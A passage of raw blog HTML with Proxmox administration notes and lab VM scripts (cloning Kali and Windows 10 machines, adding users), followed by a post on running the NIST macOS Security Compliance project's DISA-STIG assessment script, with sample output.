/></p><p> pct help [<extra-args>] [OPTIONS]</p><p><br /></p><h4 style="text-align: left;">Subscription vs. Non-Subscription</h4><p>https://johnscs.com/remove-proxmox51-subscription-notice/</p><p>https://forum.proxmox.com/threads/from-subscription-to-no-subscription.111040/</p><p>/etc/apt/sources.list.d/pve-enterprise.list:</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><p style="text-align: left;">deb [arch=amd64] http://download.proxmox.com/debian/pve bullseye pve-no-subscription⁶</p></blockquote><p><br /></p><h4>Get rid of ad</h4><p><a href="https://johnscs.com/remove-proxmox51-subscription-notice/">https://johnscs.com/remove-proxmox51-subscription-notice/</a> </p><p>ACME protocol certificate</p><p><br /></p><p>Web based interface, Command line and API</p><p><br /></p><p><br /></p><p>Add Debian Repos</p><p>User Management</p><p>pveuadm</p><p>USAGE: pveum <COMMAND> [ARGS] [OPTIONS]</p><p><br /></p><p> pveum acl delete <path> --roles <string> [OPTIONS]</p><p> pveum acl list [FORMAT_OPTIONS]</p><p> pveum acl modify <path> --roles <string> [OPTIONS]</p><p><br /></p><p> pveum group add <groupid> [OPTIONS]</p><p> pveum group delete <groupid></p><p> pveum group list [FORMAT_OPTIONS]</p><p> pveum group modify <groupid> [OPTIONS]</p><p><br /></p><p> pveum pool add <poolid> [OPTIONS]</p><p> pveum pool delete <poolid></p><p> pveum pool list [FORMAT_OPTIONS]</p><p> pveum pool modify <poolid> [OPTIONS]</p><p><br /></p><p> pveum realm add <realm> --type <string> [OPTIONS]</p><p> pveum realm delete <realm></p><p> pveum realm list [FORMAT_OPTIONS]</p><p> pveum realm modify <realm> [OPTIONS]</p><p> pveum realm sync <realm> [OPTIONS]</p><p><br /></p><p> pveum role add <roleid> [OPTIONS]</p><p> pveum role delete <roleid></p><p> pveum role list [FORMAT_OPTIONS]</p><p> pveum role modify <roleid> [OPTIONS]</p><p><br /></p><p> pveum user tfa unlock <userid></p><p> pveum user tfa delete <userid> [OPTIONS]</p><p> pveum user tfa list [<userid>]</p><p> pveum user token add <userid> <tokenid> [OPTIONS] [FORMAT_OPTIONS]</p><p> pveum user token list <userid> [FORMAT_OPTIONS]</p><p> pveum user token modify <userid> <tokenid> [OPTIONS] [FORMAT_OPTIONS]</p><p> pveum user token remove <userid> <tokenid> [FORMAT_OPTIONS]</p><p> pveum user token permissions <userid> <tokenid> [OPTIONS] [FORMAT_OPTIONS]</p><p> pveum user permissions [<userid>] [OPTIONS] [FORMAT_OPTIONS]</p><p> pveum user add <userid> [OPTIONS]</p><p> pveum user delete <userid></p><p> pveum user list [OPTIONS] [FORMAT_OPTIONS]</p><p> pveum user modify <userid> [OPTIONS]</p><p><br /></p><p> pveum passwd <userid></p><p> pveum ticket <username> [OPTIONS]</p><p><br /></p><p> pveum help [<extra-args>] [OPTIONS]</p><p><br /></p><p><br /></p><p><br /></p><p>Scripts</p><p>startall.sh</p><p>for vmid in {1000..1014}; do qm set $vmid --agent=1 --onboot=1; done</p><p>for vmid in {2000..2014}; do qm set $vmid --agent=1 --onboot=1; done</p><p>pvenode startall</p><p><br /></p><p>clone-win10.sh</p><p>for i in {2000..2014}; do qm clone 102 $i --name "Win10S$[ $i - 2000 ]"; done</p><p><br /></p><p>clone-kali.sh</p><p>for i in {1000..1014}; do qm clone 100 $i --name "KaliS$[ $i - 1000 ]"; done</p><p><br /></p><p>destroy-win10.sh</p><p>for vm in {2000..2014}; do qm destroy $vm; done</p><p><br /></p><p>shutdown-delay.sh</p><p>qm set 1001 --startup order=1,down=60</p><p><br /></p><p>for vm in {1000..1014}; do echo $vm; qm set $vm --onboot 0; done</p><p><br /></p><p>for vmid in {2000..2014}; do qm set $vmid --agent=1 --onboot=0; done</p><p><br /></p><p>destroy-kali.sh</p><p>for vm in {1000..2014}; do qm destroy $vm; done</p><p><br /></p><p>pveuser-add.sh </p><p>#!/bin/bash</p><p># encrypted password stored in /etc/shadow created by passwd command easily</p><p># assign the quoted encrypted password to the pw variable</p><p>pw="$y$j9T$G2QmgG....."</p><p><br /></p><p>for user in "$@"</p><p>do</p><p> useradd -m -s /bin/bash -p $pw $user</p><p> pveum user add ${user}@pam -comment </p><p> pveum acl modify /vms/ -user ${user}@pam -role PVEVMUser</p><p>done</p><p>pveum user list</p><p><br /></p>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0tag:blogger.com,1999:blog-9173305322166784343.post-37782441527891494112023-10-20T15:20:00.003-07:002023-10-20T16:26:13.234-07:00macOS Security Compliance<blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><h3><span face="-apple-system, "system-ui", "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-size: medium; font-weight: normal;">"The macOS security compliance project is an open source effort to provide a programmatic approach to generating security guidance. This project can be used to create customized security baselines of technical security controls by leveraging a library of rules which are mapped to compliance requirements in existing security guides or used to develop customized guidance. </span></h3><h3><span face="-apple-system, "system-ui", "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-size: medium; font-weight: normal;">Through the use of a library of rules that enhance security, and mapping them back to existing guides and policies, a single project can support multiple security guides and regulated industry policies while also allowing for documentation and QA to be uniformly managed through a single effort. This approach simplifies, and radically accelerates, the updating of annual security guidance through a unification and standardization of effort."</span></h3></blockquote><p><span face="-apple-system, "system-ui", "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-size: medium;">The macOS Security Compliance project is hosted on GitHub:</span></p><div style="background-color: white; box-sizing: border-box; color: #1f2328; font-family: -apple-system, "system-ui", "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; font-size: 16px;"></div><p><a href="https://github.com/usnistgov/macos_security">https://github.com/usnistgov/macos_security</a></p><h3 style="text-align: left;">Installing macOS Security Compliance</h3><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span face="-apple-system, "system-ui", "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-size: 16px;">Clone the git repository:</span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><br /></span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">% git clone https://github.com/usnistgov/macos_security.git</span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><br /></span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span face="-apple-system, "system-ui", "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-size: 16px; font-variant-ligatures: normal;">Change to the repository:</span></span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><br /></span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">% cd macos_security</span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><br /></span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span face="-apple-system, "system-ui", "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-size: 16px; font-variant-ligatures: normal;">View the list of available baselines:</span></span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><br /></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">% ls baselines<span class="Apple-converted-space"> </span></span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">800-171.yaml<span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>cis_lvl2.yaml</span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">800-53r5_high.yaml<span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>cisv8.yaml</span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">800-53r5_low.yaml<span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>cmmc_lvl1.yaml</span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">800-53r5_moderate.yaml<span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>cmmc_lvl2.yaml</span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">DISA-STIG.yaml<span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>cnssi-1253_high.yaml</span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">all_rules.yaml<span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>cnssi-1253_low.yaml</span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">cis_lvl1.yaml<span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>cnssi-1253_moderate.yaml</span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><br /></span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span face="-apple-system, "system-ui", "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-size: 16px; font-variant-ligatures: normal;">Browse the available wiki to see documentation for the baselines:</span></span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span face="-apple-system, "system-ui", "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-size: 16px; font-variant-ligatures: normal;"><br /></span></span></p><p class="p1" style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span style="font-family: Menlo;">https://github.com/usnistgov/macos_security/wiki</span></span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><br /></p><h3 style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px; text-align: left;"><span face="-apple-system, "system-ui", "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-size: 16px;">Generate a Compliance Script</span></h3><div><span face="-apple-system, "system-ui", "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-size: 16px;"><br /></span></div><p class="p1" style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span style="background-color: white;"><span face="-apple-system, system-ui, Segoe UI, Noto Sans, Helvetica, Arial, sans-serif, Apple Color Emoji, Segoe UI Emoji" style="color: #1f2328; font-size: medium;">From the list of the baselines, choose a baseline to assess the system. For example, if you chose the DISA-STIG baseline, then execute the following to generate the./build/DISA-STIG/DISA-STIG_compliance.sh file:</span></span></p><p class="p1" style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span style="background-color: white;"><span face="-apple-system, system-ui, Segoe UI, Noto Sans, Helvetica, Arial, sans-serif, Apple Color Emoji, Segoe UI Emoji" style="color: #1f2328;"><br /></span></span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">% ./scripts/generate_guidance.py -s baselines/DISA-STIG.yaml</span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><br /></span></p><h3 style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span face="-apple-system, "system-ui", "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-size: 16px;">Assess Compliance by Using Script</span></h3><h3 style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span face="-apple-system, "system-ui", "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-size: medium;"><br /></span></h3><div><span face="-apple-system, system-ui, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-size: medium;"> For any baseline that has been generated, begin the assessment by executing:</span></div><div><span face="-apple-system, system-ui, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328;"><br /></span></div><div><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">% sudo ./build/DISA-STIG/DISA-STIG_compliance.sh</span></p></div><h3 style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span face="-apple-system, "system-ui", "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-size: 16px;"> </span></h3><div><span face="-apple-system, "system-ui", "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-family: inherit; font-size: medium;"><br /></span></div><p class="p1" style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span face="-apple-system, system-ui, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-family: inherit; font-size: medium; font-variant-ligatures: normal;">The following text dialog will appear:</span></span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span face="-apple-system, system-ui, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-size: medium; font-variant-ligatures: normal;"><br /></span></span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4OqR_BSeTVn9DIRh15Pbo4InF3AxN9wf72I6fWITvX-t3dgAGAyUcIbGQlUoNp14jWP6XCcZ1dvdYhlVdMf6vqlJVSaLkPL0G9NK0bb5dG_OAyXoY0v99fJjgNCCXhax7ui79_NaSQDrBoaBmJQf0gqcP0j3WB6LZmlQ7ShrJyXJ4k6IlDAkbUBSe8Ijt/s1814/Screen%20Shot%202023-10-20%20at%202.20.34%20PM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="582" data-original-width="1814" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4OqR_BSeTVn9DIRh15Pbo4InF3AxN9wf72I6fWITvX-t3dgAGAyUcIbGQlUoNp14jWP6XCcZ1dvdYhlVdMf6vqlJVSaLkPL0G9NK0bb5dG_OAyXoY0v99fJjgNCCXhax7ui79_NaSQDrBoaBmJQf0gqcP0j3WB6LZmlQ7ShrJyXJ4k6IlDAkbUBSe8Ijt/w554-h178/Screen%20Shot%202023-10-20%20at%202.20.34%20PM.png" width="554" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><span face="-apple-system, system-ui, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-family: inherit; font-size: medium; font-variant-ligatures: normal;">For the first time, the "1" option will have nothing to show</span><div><span face="-apple-system, system-ui, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-family: inherit; font-size: medium; font-variant-ligatures: normal;">Instead, start with Run New Compliance Scan option by typing "2" and "return".</span><p></p><p class="p1" style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1"><span face="-apple-system, system-ui, Segoe UI, Noto Sans, Helvetica, Arial, sans-serif, Apple Color Emoji, Segoe UI Emoji" style="color: #1f2328;"><br /></span></span></p><div style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px; text-align: left;"><span class="s1"><span face="-apple-system, system-ui, Segoe UI, Noto Sans, Helvetica, Arial, sans-serif, Apple Color Emoji, Segoe UI Emoji" style="color: #1f2328; font-family: inherit; font-size: medium;">Here is a partial result that was produced by using the DISA-STIG_compliance.sh script:</span></span></div><div style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px; text-align: left;"><span class="s1"><span face="-apple-system, system-ui, Segoe UI, Noto Sans, Helvetica, Arial, sans-serif, Apple Color Emoji, Segoe UI Emoji" style="color: #1f2328; font-family: inherit;"><br /></span></span></div><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Enter choice [ 1 - 4 ] 2</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Fri Oct 20 21:24:24 UTC 2023 audit_acls_files_configure passed (Result: 0, Expected: {integer: 0})</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Fri Oct 20 21:24:24 UTC 2023 audit_acls_folders_configure passed (Result: 0, Expected: {integer: 0})</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Fri Oct 20 21:24:24 UTC 2023 audit_auditd_enabled passed (Result: pass, Expected: {string: pass})</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Fri Oct 20 21:24:24 UTC 2023 audit_configure_capacity_notify passed (Result: 25, Expected: {integer: 25})</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Fri Oct 20 21:24:24 UTC 2023 audit_failure_halt passed (Result: 1, Expected: {integer: 1})</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Fri Oct 20 21:24:24 UTC 2023 audit_files_group_configure passed (Result: 0, Expected: {integer: 0})</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; 